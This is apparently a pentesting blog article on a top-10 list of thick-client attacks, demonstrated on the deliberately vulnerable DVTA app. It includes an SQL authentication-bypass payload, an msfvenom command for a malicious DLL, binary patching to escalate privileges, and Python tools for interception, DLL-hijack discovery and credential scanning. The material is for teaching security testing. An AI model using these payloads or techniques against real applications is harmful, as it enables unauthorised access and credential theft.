Thick client Top 10 Attacks | Lucideus standard for thick client pentesting | Dinesh Sharma

Introduction:  

Thick client penetration testing needs to be performed on every thick client application, because a thick client has two attack surfaces: a static one (the binary, its libraries and the files it leaves on disk) and a dynamic one (its behaviour at run time and the traffic it sends). This differs from a web application, where the user simply browses to a URL and all processing happens on the server, with no dependency on the client's operating system or other local resources. In a thick client most of the processing happens on the client machine, so the application depends heavily on the client's resources (CPU, memory, disk), and the tester, like an attacker, has full control of that environment.

Types of thick client: 


(1) Thick client applications can be divided into two types based on proxy support:

(1.1) Proxy-aware thick client: the application has its own proxy settings, so outgoing and incoming traffic can be routed through an interception proxy and then on to the real server.

(1.2) Proxy-unaware thick client: the application has no proxy settings of its own. To route its traffic through a proxy, the tester has to change the system's hosts file so that the server's hostname resolves to the proxy machine (or redirect the traffic at the network level).

(2) Thick clients can be divided into two types based on their architecture:

(2.1) Two-tier thick client: the client communicates directly with the database server to carry out the user's tasks, as shown in diagram 1.1 below. The database credentials therefore have to be present on the client.

Diagram 1.1

(2.2) Three-tier thick client: the client talks to an application server (often over HTTP/HTTPS), and only the application server talks to the database, as shown in diagram 1.2 below. The client never connects to the database directly.


Diagram 1.2

(3) Thick clients can be divided into two types based on how they are delivered:

(3.1) stand-alone executables (exe files), or
(3.2) web-based launchers, for example a Java application started from the browser.

(4) They can also be divided based on the programming language used:

(4.1) .NET thick client
(4.2) C/C++ thick client
(4.3) Java-based thick client
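The following Python script is an added example, not part of the original article, and shows the mechanics behind the proxy-unaware case in (1.2): the hosts-file entry points the server's hostname at the tester's machine, and a small TCP relay accepts the redirected connection, records every payload in both directions and forwards it to the real server. The hostname, addresses and the request bytes are assumptions, and the echo server is a constructed stand-in for the real application server so the script runs offline.

```python
import socket
import threading


def hosts_entry(hostname, redirect_ip="127.0.0.1"):
    """Line to add to the OS hosts file so the client resolves the
    server name to the machine running the relay (assumed hostname)."""
    return f"{redirect_ip}\t{hostname}"


class TcpRelay:
    """Transparent TCP forwarder: accepts the redirected client connection,
    logs each payload with its direction and forwards it to the real server."""

    def __init__(self, listen_port, upstream_host, upstream_port):
        self.upstream = (upstream_host, upstream_port)
        self.log = []  # (direction, bytes) in the order seen
        self._stop = threading.Event()
        self._srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self._srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        self._srv.bind(("127.0.0.1", listen_port))
        self._srv.listen(5)
        self.port = self._srv.getsockname()[1]  # real port when listen_port is 0

    def _pump(self, src, dst, direction):
        """Copy bytes src -> dst until src closes, recording each chunk."""
        try:
            while not self._stop.is_set():
                data = src.recv(4096)
                if not data:
                    break
                self.log.append((direction, data))
                dst.sendall(data)
        except OSError:
            pass
        finally:
            try:
                dst.shutdown(socket.SHUT_WR)  # propagate the half-close
            except OSError:
                pass

    def _handle(self, client):
        upstream = socket.create_connection(self.upstream)
        pumps = [
            threading.Thread(target=self._pump, args=(client, upstream, "C->S"), daemon=True),
            threading.Thread(target=self._pump, args=(upstream, client, "S->C"), daemon=True),
        ]
        for t in pumps:
            t.start()
        for t in pumps:
            t.join()
        client.close()
        upstream.close()

    def serve_forever(self):
        while not self._stop.is_set():
            try:
                client, _ = self._srv.accept()
            except OSError:
                break  # listening socket closed by stop()
            threading.Thread(target=self._handle, args=(client,), daemon=True).start()

    def start(self):
        threading.Thread(target=self.serve_forever, daemon=True).start()
        return self

    def stop(self):
        self._stop.set()
        self._srv.close()


def start_echo_server():
    """Constructed stand-in for the real server: serves one connection and
    echoes each message back with an 'ECHO:' prefix. Returns its port."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(1)

    def run():
        conn, _ = srv.accept()
        with conn:
            while True:
                data = conn.recv(4096)
                if not data:
                    break
                conn.sendall(b"ECHO:" + data)
        srv.close()

    threading.Thread(target=run, daemon=True).start()
    return srv.getsockname()[1]


def demo(request=b"LOGIN user=rebecca pass=secret\n"):
    """Push one constructed request through the relay; return the reply
    and the relay log so the intercepted traffic can be inspected."""
    relay = TcpRelay(0, "127.0.0.1", start_echo_server()).start()
    with socket.create_connection(("127.0.0.1", relay.port)) as c:
        c.sendall(request)
        c.shutdown(socket.SHUT_WR)  # done sending; now collect the reply
        reply = b""
        while True:
            chunk = c.recv(4096)
            if not chunk:
                break
            reply += chunk
    relay.stop()
    return reply, list(relay.log)


if __name__ == "__main__":
    print(hosts_entry("dvta.example.local"))
    for direction, data in demo()[1]:
        print(direction, data)
```

This relays raw TCP, so it only exposes clear-text protocols. For TLS the relay has to be a TLS-terminating proxy (for example Burp's invisible proxy mode) and the client must trust the proxy's CA certificate; a client that pins its certificate, or that connects to a hard-coded IP address instead of a hostname, needs the hosts-file step replaced by a route or a patch to the binary.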

Now that the basics of thick clients are covered, it is time to talk about the Lucideus thick client top 10.



Diagram 1.3


1. Injection: In thick client applications, injection attacks such as SQLi, XML injection and CSV injection are also possible, as most three-tier thick clients use HTTP to communicate with the server and two-tier clients talk to the database directly. DVTA (Damn Vulnerable Thick Client Application) can be used to demonstrate injection attacks in a thick client.


         1.1 SQLI: Like web applications, thick clients may be vulnerable to SQLi, since they connect to a database for authentication or to fetch data needed by the application workflow.

Step 1: Launch the DVTA application and enter the SQL authentication-bypass payload 1' or '1'='1 in both the username and the password field.

Diagram 1.4

Step 2: As can be seen in diagram 1.5 below, the attacker is logged in to the application without valid credentials.

Diagram 1.5

Note: most other web vulnerabilities are possible in thick clients as well, except purely browser-based ones such as XSS and CSRF.
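As an added example that is not part of the original article, the following Python script reproduces the bypass from steps 1 and 2 against a constructed in-memory SQLite table and places the parameterized query beside it. DVTA itself uses a SQL Server back end; the table contents, the column name isadmin and the passwords are assumptions, chosen only to show the query shape.

```python
import sqlite3

# The authentication-bypass payload used in the walkthrough above.
BYPASS_PAYLOAD = "1' or '1'='1"


def make_db():
    """Constructed in-memory stand-in for the application's user table."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (username TEXT, password TEXT, isadmin INTEGER)")
    con.executemany(
        "INSERT INTO users VALUES (?, ?, ?)",
        [("admin", "Str0ngAdm1n!", 1), ("rebecca", "rebecca", 0)],
    )
    return con


def build_vulnerable_query(username, password):
    """String concatenation, the pattern behind the bypass: user input
    becomes part of the SQL grammar instead of a bound value. With the
    payload in both fields the WHERE clause parses as
    username='1' OR ('1'='1' AND password='1') OR '1'='1', which is
    always true."""
    return (
        "SELECT username, isadmin FROM users WHERE username='"
        + username + "' AND password='" + password + "'"
    )


def login_vulnerable(con, username, password):
    """Returns (username, isadmin) of the first matching row, or None."""
    return con.execute(build_vulnerable_query(username, password)).fetchone()


def login_parameterized(con, username, password):
    """Hardened form: the driver binds the values, so quotes in the input
    can never change the structure of the WHERE clause."""
    return con.execute(
        "SELECT username, isadmin FROM users WHERE username=? AND password=?",
        (username, password),
    ).fetchone()


if __name__ == "__main__":
    con = make_db()
    print(build_vulnerable_query(BYPASS_PAYLOAD, BYPASS_PAYLOAD))
    print("vulnerable:   ", login_vulnerable(con, BYPASS_PAYLOAD, BYPASS_PAYLOAD))
    print("parameterized:", login_parameterized(con, BYPASS_PAYLOAD, BYPASS_PAYLOAD))
```

Two points follow from where the query runs. In a two-tier client the concatenation happens on the client, so escaping there does not help (the attacker can patch it out); the database account the client uses must be least-privileged and the statements parameterized. In a three-tier client the fix belongs on the application server, and the role value the server returns (isadmin here) is the only role decision the client should honour, which is the point of item 2 below.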

2. Broken access control: Broken access control can be found in thick clients either in the HTTP traffic or by modifying the application itself. Here, using DVTA, the attacker achieves privilege escalation by patching the decompiled source code and rebuilding the binary; the role decision is made on the client, so the client can be made to lie.

Step 1: Decompile the DVTA application, change the isadmin value from 1 to 0 in the decompiled source, and rebuild the binary.


Diagram 1.6

Diagram 1.7 

Step 2: Log in to the rebuilt DVTA application as the ordinary user rebecca; the user is logged in with the admin account's privileges.

Diagram 1.8

Diagram 1.9

3. Insecure local storage: DVTA stores sensitive data such as user credentials in the Windows registry, and the same values can be recovered from the process memory as plain-text strings.

Diagram 1.10


4. Hardcoded sensitive information: Sensitive information such as the FTP credentials is hardcoded in the application source file admin.cs, so anyone who decompiles the binary obtains it.


Diagram 1.11 

5. Unencrypted communication: In DVTA the FTP server credentials are transferred in plain text in the application's network traffic, where a sniffer or an interception proxy can read them.

Diagram 1.12

6. DLL hijacking: DVTA is vulnerable to DLL hijacking. A malicious DLL generated with msfvenom can be placed in the application folder under the name of a DLL the application looks for there; it is loaded at run time and, in this PoC, opens the calculator on the system.

Diagram 1.13

Diagram 1.14 
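Finding which DLL name to use for the attack in item 6 is the part the diagrams do not show. The Python script below is an added example, not part of the original article or of DVTA: it runs the usual search-order check over a constructed Process Monitor-style export, reporting DLLs the loader probed for in a user-writable directory and failed to find there before finding them elsewhere (search-order hijack), and DLLs it loaded straight from a writable directory (replaceable). The CSV rows, the DLL names and the set of writable directories are assumptions.

```python
import csv
import io
import ntpath

# Constructed Process Monitor-style export (not real DVTA output); only the
# columns the check needs are kept, and the order is the loader's probe order.
SAMPLE_PROCMON_CSV = r"""Process Name,Operation,Path,Result
DVTA.exe,CreateFile,C:\Program Files\DVTA\DWrite.dll,NAME NOT FOUND
DVTA.exe,CreateFile,C:\Windows\System32\DWrite.dll,SUCCESS
DVTA.exe,CreateFile,C:\Program Files\DVTA\sqlite3.dll,SUCCESS
DVTA.exe,CreateFile,C:\Users\rebecca\AppData\Local\DVTA\version.dll,NAME NOT FOUND
DVTA.exe,CreateFile,C:\Windows\System32\version.dll,SUCCESS
DVTA.exe,CreateFile,C:\Windows\System32\kernel32.dll,SUCCESS
"""

# Directories the low-privileged test user can write to (assumed here; in an
# assessment take them from icacls or AccessChk).
WRITABLE_DIRS = {
    r"C:\Program Files\DVTA",
    r"C:\Users\rebecca\AppData\Local\DVTA",
}


def _dll_probes(csv_text, process):
    """Group the CreateFile events for one process by DLL name, keeping the
    loader's probe order: {dll name: [(path, result), ...]}."""
    probes = {}
    for row in csv.DictReader(io.StringIO(csv_text)):
        if row["Process Name"] != process or row["Operation"] != "CreateFile":
            continue
        if not row["Path"].lower().endswith(".dll"):
            continue
        name = ntpath.basename(row["Path"]).lower()
        probes.setdefault(name, []).append((row["Path"], row["Result"]))
    return probes


def _in_writable(path, writable_dirs):
    writable = {d.lower().rstrip("\\") for d in writable_dirs}
    return ntpath.dirname(path).lower() in writable


def hijack_candidates(csv_text, writable_dirs, process="DVTA.exe"):
    """(dll, path) pairs where a writable directory was probed and came up
    empty before the real DLL was found: drop a DLL at that path and the
    loader takes it first."""
    found = []
    for name, attempts in _dll_probes(csv_text, process).items():
        for path, result in attempts:
            if result == "SUCCESS":
                break  # real DLL located; later probes never happen
            if result == "NAME NOT FOUND" and _in_writable(path, writable_dirs):
                found.append((name, path))
    return found


def loaded_from_writable(csv_text, writable_dirs, process="DVTA.exe"):
    """(dll, path) pairs loaded directly from a writable directory: no
    search-order trick needed, the file can simply be replaced."""
    found = []
    for name, attempts in _dll_probes(csv_text, process).items():
        for path, result in attempts:
            if result == "SUCCESS" and _in_writable(path, writable_dirs):
                found.append((name, path))
    return found


if __name__ == "__main__":
    for hit in hijack_candidates(SAMPLE_PROCMON_CSV, WRITABLE_DIRS):
        print("hijackable:", *hit)
    for hit in loaded_from_writable(SAMPLE_PROCMON_CSV, WRITABLE_DIRS):
        print("replaceable:", *hit)
```

Once a candidate such as DWrite.dll in the application folder is confirmed, the PoC DLL from the text is built with msfvenom, for example msfvenom -p windows/x64/exec CMD=calc.exe -f dll -o DWrite.dll (the name is the assumed candidate from the sample data; the architecture must match the process). Confirm the hit in Process Monitor after dropping the file: the probe in the writable directory should now show SUCCESS and the System32 probe should disappear.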

 7. Insecure password management: In DVTA a user can create an account with any password; no password policy is defined, so an attacker can guess or brute-force user passwords easily. As can be seen in diagram 1.15 below, the user creates an account with the password 2, which is trivially guessable.

Diagram 1.15


8. Weak code quality: Application source code quality needs to be maintained. DVTA has no integrity checks, its code is not obfuscated, and no anti-reverse-engineering protection is implemented, so the decompiled code reads like the original source. A PoC for the lack of obfuscation is given below.

Diagram 1.16


9. Weak configuration management: Applications may store credentials in configuration files. In DVTA the database credentials are stored in the application's configuration file in plain text, readable by any user who can open the file.


Diagram 1.17
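Items 3, 4, 5 and 9 are all found the same way: pull the printable strings out of whatever artefact is in hand (a binary, a memory dump, a config file, a traffic capture) and look for credential shapes. The Python scanner below is an added example, not part of the original article or of DVTA; it extracts ASCII and UTF-16LE strings (the encoding .NET uses for strings in memory) and matches a few credential patterns. The blob it runs over is constructed inline and the hostnames, usernames and passwords in it are invented, so the script runs offline on the page.

```python
import re

# Printable runs, like `strings -n 6`: ASCII, and UTF-16LE as used by .NET.
ASCII_RUN = re.compile(rb"[\x20-\x7e]{6,}")
UTF16_RUN = re.compile(rb"(?:[\x20-\x7e]\x00){6,}")

CREDENTIAL_PATTERNS = [
    ("credential embedded in URL",
     re.compile(r"\b(?:ftp|https?)://[^\s/:@]+:[^\s/@]+@\S+", re.I)),
    ("password in connection string / config",
     re.compile(r'(?:password|pwd)\s*=\s*[^;\s"<>]+', re.I)),
    ("config key holding a password",
     re.compile(r'key="[^"]*pass[^"]*"\s+value="[^"]*"', re.I)),
    ("FTP PASS command in clear text",
     re.compile(r"^PASS\s+\S+", re.I | re.M)),
]

# Constructed artefact mixing the four sources the article lists: a hard-coded
# URL, a .NET connection string as it sits in memory, an app.config fragment and
# a captured FTP login. All values are invented.
SAMPLE_BLOB = (
    b"\x4d\x5a\x90\x00\x03\x00\x00\x00"
    + b"ftp://ftpuser:S3cretFtp@192.0.2.10/uploads\x00"
    + b"\x00\x01\x02"
    + "Data Source=192.0.2.20;User ID=sa;Password=Db!Passw0rd".encode("utf-16-le")
    + b"\x00\x00"
    + b'<add key="FTPPASSWORD" value="S3cretFtp" />\r\n'
    + b"USER ftpuser\r\nPASS S3cretFtp\r\n"
)


def extract_strings(blob):
    """All printable ASCII and UTF-16LE runs, in file-offset order."""
    found = [(m.start(), m.group().decode("ascii")) for m in ASCII_RUN.finditer(blob)]
    found += [(m.start(), m.group().decode("utf-16-le")) for m in UTF16_RUN.finditer(blob)]
    found.sort()
    return [s for _, s in found]


def find_credentials(blob):
    """(label, matched text) for every credential-shaped string in the blob."""
    hits = []
    for s in extract_strings(blob):
        for label, pattern in CREDENTIAL_PATTERNS:
            hits.extend((label, m.group()) for m in pattern.finditer(s))
    return hits


if __name__ == "__main__":
    for label, text in find_credentials(SAMPLE_BLOB):
        print(f"{label}: {text}")
```

The same function runs unchanged over a process dump (for item 3), the decompiled or raw binary (item 4), a pcap's TCP payloads (item 5) and the app.config or registry export (item 9); the patterns are a starting set and should be extended with whatever naming the application under test uses. Expect false positives from the key/value pattern and review each hit.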

10. Security misconfiguration: Servers that handle the application's traffic need to be configured properly. In the case of DVTA, the database server version is disclosed in the server's response, which helps an attacker find publicly available exploits for an outdated server version.

Diagram 1.18



Conclusion:

Because thick client applications have two attack surfaces, static and dynamic, a vulnerability assessment needs to cover both in order to ensure that the application is ready to withstand attack.



Article Link: https://blog.lucideus.com/2020/06/lucideus-thick-client-top-10-attacks-you-need-to-use-as-standard.html